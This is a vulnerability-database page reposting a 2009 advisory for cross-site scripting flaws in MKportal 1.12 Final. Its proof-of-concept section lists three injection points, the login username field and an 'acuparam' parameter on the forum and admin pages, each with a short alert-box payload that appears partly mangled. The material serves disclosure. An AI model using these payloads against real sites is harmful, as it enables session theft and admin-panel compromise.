MKportal 1.12 Final Multiple Remote XSS

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051993 漏洞类型
发布时间 2009-04-26 更新时间 2009-04-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009040077
|漏洞详情
漏洞细节尚未披露
|漏洞EXP 
# Name Of Script : MKportal 1.12 Final
 
# Download From : http://www.mkportal.it/index.php?ind=downloads&op=download_file&ide=935&file=MKportal_C12_final.zip
 
# Found By : RoMaNcYxHaCkEr
 
# My Group : Security - Codes
 
# My Homepage : WwW.Sec-Code.CoM
 
# Type Of Exploit : XSS
 
==================================================================================================================
 
# P.O.C : In Different Files(That,s Also Depeneding About The Forum What,s He Installed)
 
1 - In File aeforum/main/login.php In Variable username By POST Method:
 
http://WwW.Sec-Code.CoM/MKportal/aeforum/index.php?act=login
 
username=>">alert(111111.111111111)%3B&password=Password&anonymously=on&login=1&remember=1&mk_return=1&submit=Login
 
2 - In File aeforum/index.php :
 
http://WwW.Sec-Code.CoM/MKportal/aeforum/index.php?acuparam=>">
 
3 - In File mkportal/admin/index.php :
 
http://WwW.Sec-Code.CoM/MKportal/mkportal/admin/index.php?acuparam=>">
 
===================================================================================================================
 
# rXh
 
# bEST wISHES
检索漏洞
开始时间
结束时间
相关漏洞